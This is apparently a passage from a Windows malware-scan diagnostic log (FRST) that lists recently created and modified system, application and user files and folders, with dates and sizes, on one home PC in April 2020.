2020-04-17 18:06 - 2020-04-17 18:06 - 000197632 _____ (Microsoft Corporation) C:\WINDOWS\system32\Win32CompatibilityAppraiserCSP.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000178192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\partmgr.sys
2020-04-17 18:06 - 2020-04-17 18:06 - 000164368 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2020-04-17 18:06 - 2020-04-17 18:06 - 000147696 _____ (Microsoft Corporation) C:\WINDOWS\system32\smss.exe
2020-04-17 18:06 - 2020-04-17 18:06 - 000142544 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicensingUI.exe
2020-04-17 18:06 - 2020-04-17 18:06 - 000140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\slc.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000136192 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppc.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000125952 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontsub.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000122368 _____ (Microsoft Corporation) C:\WINDOWS\system32\samlib.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000115120 _____ (Microsoft Corporation) C:\WINDOWS\system32\phoneactivate.exe
2020-04-17 18:06 - 2020-04-17 18:06 - 000105984 _____ (Microsoft Corporation) C:\WINDOWS\system32\utcutil.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000102216 _____ (Microsoft Corporation) C:\WINDOWS\system32\changepk.exe
2020-04-17 18:06 - 2020-04-17 18:06 - 000071480 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32appinventorycsp.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcadm.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000060928 _____ (Microsoft Corporation) C:\WINDOWS\system32\mf3216.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000058880 _____ C:\WINDOWS\system32\runexehelper.exe
2020-04-17 18:06 - 2020-04-17 18:06 - 000051200 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcalua.exe
2020-04-17 18:06 - 2020-04-17 18:06 - 000043008 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpgradeResultsUI.exe
2020-04-17 18:06 - 2020-04-17 18:06 - 000036152 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2020-04-17 18:06 - 2020-04-17 18:06 - 000033792 _____ (Microsoft Corporation) C:\WINDOWS\system32\sxssrv.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000033080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hwpolicy.sys
2020-04-17 18:06 - 2020-04-17 18:06 - 000031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wksprtPS.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\slcext.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\dciman32.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcaevts.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000012288 _____ (Microsoft Corporation) C:\WINDOWS\system32\pacjsworker.exe
2020-04-17 18:06 - 2020-04-17 18:06 - 000008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\msimg32.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000003072 _____ (Microsoft Corporation) C:\WINDOWS\system32\lpk.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 007849216 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 006168064 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 003729408 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2020-04-17 18:05 - 2020-04-17 18:05 - 003587384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2020-04-17 18:05 - 2020-04-17 18:05 - 003109376 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 002717184 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2020-04-17 18:05 - 2020-04-17 18:05 - 002453504 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallService.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 001918976 _____ (Microsoft Corporation) C:\WINDOWS\system32\wevtsvc.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 001764336 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 001656904 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 001612800 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 001603584 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 001497600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 001480192 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocoreworker.exe
2020-04-17 18:05 - 2020-04-17 18:05 - 001427456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.Vpn.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 001378528 _____ (Microsoft Corporation) C:\WINDOWS\system32\webservices.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 001318912 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 001180672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Web.Core.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 001136128 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApiPublic.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 001083904 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 001011200 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000915192 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000874296 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2020-04-17 18:05 - 2020-04-17 18:05 - 000840704 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Language.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000684560 _____ (Microsoft Corporation) C:\WINDOWS\system32\SHCore.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000605184 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2020-04-17 18:05 - 2020-04-17 18:05 - 000550400 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2020-04-17 18:05 - 2020-04-17 18:05 - 000524264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Enumeration.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000516096 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe
2020-04-17 18:05 - 2020-04-17 18:05 - 000459688 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotifyIcon.exe
2020-04-17 18:05 - 2020-04-17 18:05 - 000441144 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2020-04-17 18:05 - 2020-04-17 18:05 - 000408064 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncbservice.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000355840 _____ (Microsoft Corporation) C:\WINDOWS\system32\WaaSMedicSvc.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000339304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Storage.ApplicationData.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000285184 _____ (Microsoft Corporation) C:\WINDOWS\system32\WaaSMedicCapsule.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000265216 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdd.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000259072 _____ (Microsoft Corporation) C:\WINDOWS\system32\VPNv2CSP.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000256000 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateDeploymentProvider.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000241152 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanagerprecheck.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000231936 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallServiceTasks.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000231912 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceaccess.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000200192 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000152408 _____ (Microsoft Corporation) C:\WINDOWS\system32\KerbClientShared.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000127280 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32u.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000096768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Custom.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000089088 _____ (Microsoft Corporation) C:\WINDOWS\system32\WaaSMedicAgent.exe
2020-04-17 18:05 - 2020-04-17 18:05 - 000070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\keepaliveprovider.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\tbauth.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000057856 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000047000 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2020-04-17 18:05 - 2020-04-17 18:05 - 000045568 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmintegrator.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBrokerCookies.exe
2020-04-17 18:05 - 2020-04-17 18:05 - 000028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\WaaSMedicPS.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Custom.ps.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\sbservicetrigger.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 017790464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 003708928 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 002131456 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcDesktopMonSvc.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 002126144 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 002114560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.CloudStore.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 001960448 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 001942528 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 001783296 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Input.Inking.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 001762816 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 001719808 _____ (Microsoft Corporation) C:\WINDOWS\system32\Wpc.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 001413704 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 001263856 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcMon.exe
2020-04-17 18:04 - 2020-04-17 18:04 - 001127424 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcRefreshTask.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 001071616 _____ (Microsoft Corporation) C:\WINDOWS\system32\BTAGService.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000893952 _____ (Microsoft Corporation) C:\WINDOWS\system32\FlightSettings.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000879616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Management.Service.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000735744 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000722072 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000654912 _____ (Microsoft Corporation) C:\WINDOWS\system32\advapi32.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000637240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storport.sys
2020-04-17 18:04 - 2020-04-17 18:04 - 000589384 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2020-04-17 18:04 - 2020-04-17 18:04 - 000469504 _____ (Microsoft Corporation) C:\WINDOWS\system32\cloudAP.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000437560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys
2020-04-17 18:04 - 2020-04-17 18:04 - 000416016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000355328 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcApi.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000297272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2020-04-17 18:04 - 2020-04-17 18:04 - 000278016 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcTok.exe
2020-04-17 18:04 - 2020-04-17 18:04 - 000268288 _____ (Microsoft Corporation) C:\WINDOWS\system32\dot3svc.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000251392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\winnat.sys
2020-04-17 18:04 - 2020-04-17 18:04 - 000193848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2020-04-17 18:04 - 2020-04-17 18:04 - 000169472 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpatialAudioLicenseSrv.exe
2020-04-17 18:04 - 2020-04-17 18:04 - 000158720 _____ (Microsoft Corporation) C:\WINDOWS\system32\umpo.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000151352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\scmbus.sys
2020-04-17 18:04 - 2020-04-17 18:04 - 000129024 _____ (Microsoft Corporation) C:\WINDOWS\system32\UtcDecoderHost.exe
2020-04-17 18:04 - 2020-04-17 18:04 - 000108032 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanprotdim.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000103936 _____ (Microsoft Corporation) C:\WINDOWS\system32\dot3msm.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\dot3api.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000089912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\volmgr.sys
2020-04-17 18:04 - 2020-04-17 18:04 - 000088352 _____ (Microsoft Corporation) C:\WINDOWS\system32\remoteaudioendpoint.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000076288 _____ (Microsoft Corporation) C:\WINDOWS\system32\autopilot.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Management.EnrollmentStatusTracking.ConfigProvider.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000060416 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudNotifications.exe
2020-04-17 18:04 - 2020-04-17 18:04 - 000059192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storufs.sys
2020-04-17 18:04 - 2020-04-17 18:04 - 000057344 _____ (Microsoft Corporation) C:\WINDOWS\system32\audioresourceregistrar.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000044032 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.Common.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000043008 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiredNetworkCSP.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000039424 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcProxyStubs.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000030720 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\KNetPwrDepBroker.sys
2020-04-17 18:04 - 2020-04-17 18:04 - 000028160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\flpydisk.sys
2020-04-17 18:04 - 2020-04-17 18:04 - 000018944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sfloppy.sys
2020-04-17 17:38 - 2020-04-17 17:39 - 000492544 _____ (Microsoft Corporation) C:\WINDOWS\system32\poqexec.exe
2020-04-17 17:38 - 2020-04-17 17:39 - 000390656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\poqexec.exe
2020-04-17 17:14 - 2020-04-17 17:14 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2020-04-15 17:16 - 2020-04-02 16:20 - 000337592 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\avgBoot.exe
2020-04-14 10:27 - 2020-04-14 10:27 - 000290816 _____ C:\Users\JLO Squared\Desktop\Easter Cards.pub
2020-04-14 04:19 - 2020-04-14 04:19 - 000047600 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-stable.sys
2020-04-14 04:19 - 2020-04-14 04:19 - 000047600 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-dev.sys
2020-04-14 04:19 - 2020-04-14 04:19 - 000047600 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-canary.sys
2020-04-14 04:19 - 2020-04-14 04:19 - 000044552 _____ (Dropbox, Inc.) C:\WINDOWS\system32\DbxSvc.exe
2020-04-10 08:01 - 2020-04-10 08:01 - 000005556 _____ C:\Users\JLO Squared\Downloads\Louwerse Mar Statement.pdf
2020-04-08 08:54 - 2020-04-08 08:54 - 000000000 ___HD C:\$AV_AVG
2020-04-07 18:13 - 2020-04-07 18:13 - 000001773 _____ C:\Users\JLO Squared\Desktop\Internet Explorer.lnk
2020-04-02 16:22 - 2020-04-02 16:21 - 000235768 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgStm.sys
2020-04-02 16:22 - 2020-04-02 16:21 - 000175984 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgMonFlt.sys
2020-04-02 16:11 - 2020-04-29 11:39 - 000000000 ____D C:\Program Files (x86)\Dropbox
2020-04-02 16:11 - 2020-04-18 00:17 - 000000932 _____ C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job
2020-04-02 16:11 - 2020-04-18 00:17 - 000000928 _____ C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job
2020-04-02 16:11 - 2020-04-16 13:15 - 000003446 _____ C:\WINDOWS\system32\Tasks\DropboxUpdateTaskMachineUA
2020-04-02 16:11 - 2020-04-16 13:15 - 000003222 _____ C:\WINDOWS\system32\Tasks\DropboxUpdateTaskMachineCore
2020-04-02 16:11 - 2020-04-02 16:11 - 000000000 ____D C:\ProgramData\Dropbox
2020-04-02 16:10 - 2020-04-02 16:10 - 000001823 _____ C:\Users\Public\Desktop\iTunes.lnk
2020-04-02 16:10 - 2020-04-02 16:10 - 000001823 _____ C:\ProgramData\Desktop\iTunes.lnk
2020-04-02 16:10 - 2020-04-02 16:10 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2020-04-02 16:10 - 2020-04-02 16:10 - 000000000 ____D C:\Program Files\iTunes
2020-04-02 16:10 - 2020-04-02 16:10 - 000000000 ____D C:\Program Files\iPod
2020-04-02 16:08 - 2020-04-02 16:08 - 000000000 ____D C:\WINDOWS\system32\Tasks\Apple
2020-04-02 16:08 - 2020-04-02 16:08 - 000000000 ____D C:\Program Files (x86)\Apple Software Update
2020-04-02 15:44 - 2020-04-02 15:45 - 000000000 ____D C:\Users\JLO Squared\Desktop\Pending Reimb
2020-04-02 15:43 - 2020-04-02 15:47 - 000000000 ____D C:\Users\JLO Squared\Desktop\Learn Photography
2020-04-02 15:41 - 2020-04-02 16:01 - 000000000 ____D C:\Users\JLO Squared\Desktop\Library
2020-04-02 15:41 - 2020-04-02 16:01 - 000000000 ____D C:\Users\JLO Squared\Desktop\Home Life Management Lists

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2020-04-29 12:11 - 2016-10-21 08:56 - 000000000 ____D C:\Users\JLO Squared\AppData\Roaming\TeamViewer
2020-04-29 12:07 - 2019-03-18 20:37 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2020-04-29 12:06 - 2019-08-21 22:14 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2020-04-29 12:06 - 2019-03-18 20:52 - 000000000 ___HD C:\Program Files\WindowsApps
2020-04-29 12:06 - 2019-03-18 20:52 - 000000000 ____D C:\WINDOWS\AppReadiness
2020-04-29 12:05 - 2019-03-18 20:52 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2020-04-29 12:04 - 2020-03-03 17:04 - 000000000 ____D C:\Program Files (x86)\SAntivirus
2020-04-29 12:04 - 2017-08-12 13:03 - 000000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2020-04-29 12:04 - 2016-04-03 09:48 - 000000000 __SHD C:\Users\JLO Squared\IntelGraphicsProfiles
2020-04-29 11:56 - 2016-02-13 05:20 - 000000000 __RHD C:\Users\Public\AccountPictures
2020-04-29 11:30 - 2019-08-21 21:46 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2020-04-27 16:17 - 2019-08-21 22:14 - 000003590 _____ C:\WINDOWS\system32\Tasks\JLO Squared DBAgent 2 0
2020-04-26 03:10 - 2016-06-22 23:29 - 000002268 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2020-04-23 02:27 - 2020-03-03 17:14 - 000004266 _____ C:\WINDOWS\system32\Tasks\Antivirus Emergency Update
2020-04-18 11:49 - 2019-08-21 22:14 - 000003372 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3444092895-3226993445-944412456-1001
2020-04-18 11:44 - 2020-03-03 17:05 - 000000000 ____D C:\ProgramData\AVG
2020-04-18 00:25 - 2019-08-21 22:01 - 000936852 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2020-04-18 00:23 - 2019-03-18 20:52 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2020-04-18 00:18 - 2019-03-18 20:50 - 000000000 ____D C:\WINDOWS\INF
2020-04-18 00:17 - 2019-12-02 08:14 - 000000370 _____ C:\WINDOWS\Tasks\HPCeeScheduleForJLO Squared.job
2020-04-18 00:17 - 2019-08-21 21:46 - 000476240 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2020-04-18 00:15 - 2019-03-18 20:52 - 000000000 ____D C:\WINDOWS\SystemResources
2020-04-18 00:15 - 2019-03-18 20:52 - 000000000 ____D C:\WINDOWS\system32\PerceptionSimulation
2020-04-18 00:15 - 2019-03-18 20:52 - 000000000 ____D C:\WINDOWS\system32\migwiz
2020-04-18 00:14 - 2019-03-18 20:52 - 000000000 ____D C:\WINDOWS\ShellExperiences
2020-04-18 00:14 - 2019-03-18 20:52 - 000000000 ____D C:\WINDOWS\Provisioning
2020-04-18 00:14 - 2019-03-18 20:52 - 000000000 ____D C:\WINDOWS\bcastdvr
2020-04-17 23:59 - 2019-08-21 22:14 - 000004160 _____ C:\WINDOWS\system32\Tasks\User_Feed_Synchronization-{460E0171-AD0B-4E0B-B9E3-D9A7C24DD923}
2020-04-17 18:28 - 2013-08-22 05:25 - 000000199 _____ C:\WINDOWS\win.ini
2020-04-17 18:12 - 2019-03-18 20:37 - 000000000 ____D C:\WINDOWS\CbsTemp
2020-04-17 18:11 - 2020-03-23 13:02 - 000000000 ____D C:\Users\JLO Squared\AppData\Local\chromium
2020-04-16 13:15 - 2020-03-09 11:15 - 000002818 _____ C:\WINDOWS\system32\Tasks\HPCeeScheduleForJLO Squared
2020-04-16 13:15 - 2020-03-03 20:37 - 000000000 ____D C:\WINDOWS\system32\Tasks\AVAST Software
2020-04-16 13:15 - 2020-03-03 17:05 - 000003368 _____ C:\WINDOWS\system32\Tasks\ChromiumUpdateTaskMachineUA
2020-04-16 13:15 - 2020-03-03 17:05 - 000003144 _____ C:\WINDOWS\system32\Tasks\ChromiumUpdateTaskMachineCore
2020-04-16 13:15 - 2019-08-21 22:14 - 000003482 _____ C:\WINDOWS\system32\Tasks\Adobe Acrobat Update Task
2020-04-16 13:15 - 2019-08-21 22:14 - 000003348 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineUA
2020-04-16 13:15 - 2019-08-21 22:14 - 000003124 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineCore
2020-04-16 13:15 - 2019-08-21 22:14 - 000003042 _____ C:\WINDOWS\system32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473
2020-04-16 13:15 - 2019-08-21 22:14 - 000003006 _____ C:\WINDOWS\system32\Tasks\JLO Squared1
2020-04-16 13:15 - 2019-08-21 22:14 - 000002800 _____ C:\WINDOWS\system32\Tasks\Seagate_Install_Launch
2020-04-16 13:15 - 2019-08-21 22:14 - 000002680 _____ C:\WINDOWS\system32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473-Logon
2020-04-16 13:15 - 2019-08-21 22:14 - 000002638 _____ C:\WINDOWS\system32\Tasks\HPCustParticipation HP ENVY 7640 series
2020-04-16 13:15 - 2019-08-21 22:14 - 000002364 _____ C:\WINDOWS\system32\Tasks\McAfeeLogon
2020-04-16 13:15 - 2019-08-21 22:14 - 000002226 _____ C:\WINDOWS\system32\Tasks\McAfee Remediation (Prepare)
2020-04-16 13:15 - 2019-08-21 22:14 - 000002204 _____ C:\WINDOWS\system32\Tasks\DropboxOEM
2020-04-16 13:15 - 2019-08-21 22:14 - 000002138 _____ C:\WINDOWS\system32\Tasks\Start SimplePass
2020-04-16 13:15 - 2019-08-21 22:14 - 000002076 _____ C:\WINDOWS\system32\Tasks\Start OPBHOBrokerDesktop
2020-04-16 13:15 - 2019-08-21 22:14 - 000002064 _____ C:\WINDOWS\system32\Tasks\Start OPBHOBroker
2020-04-16 10:21 - 2020-03-03 17:13 - 000459992 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgSP.sys
2020-04-16 00:33 - 2020-03-03 17:19 - 000002006 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG AntiVirus FREE.lnk
2020-04-16 00:33 - 2020-03-03 17:19 - 000001994 _____ C:\Users\Public\Desktop\AVG AntiVirus FREE.lnk
2020-04-16 00:33 - 2020-03-03 17:19 - 000001994 _____ C:\ProgramData\Desktop\AVG AntiVirus FREE.lnk
2020-04-16 00:09 - 2020-03-24 08:11 - 000002401 _____ C:\Users\JLO Squared\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft Teams.lnk
2020-04-16 00:09 - 2020-03-24 08:11 - 000002393 _____ C:\Users\JLO Squared\Desktop\Microsoft Teams.lnk
2020-04-15 17:16 - 2019-03-18 20:52 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2020-04-15 12:51 - 2020-03-22 14:22 - 000000000 ____D C:\Users\JLO Squared\AppData\Local\CrashDumps
2020-04-13 05:05 - 2019-03-18 20:52 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2020-04-11 03:20 - 2019-08-21 03:31 - 000002388 _____ C:\Users\JLO Squared\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2020-04-11 03:20 - 2016-05-14 14:18 - 000000000 ___RD C:\Users\JLO Squared\OneDrive
2020-04-10 08:12 - 2017-12-04 18:40 - 000000000 ____D C:\Users\JLO Squared\Desktop\Josh's Files
2020-04-08 16:33 - 2018-03-02 13:26 - 000000000 ____D C:\Users\JLO Squared\Desktop\Addresses
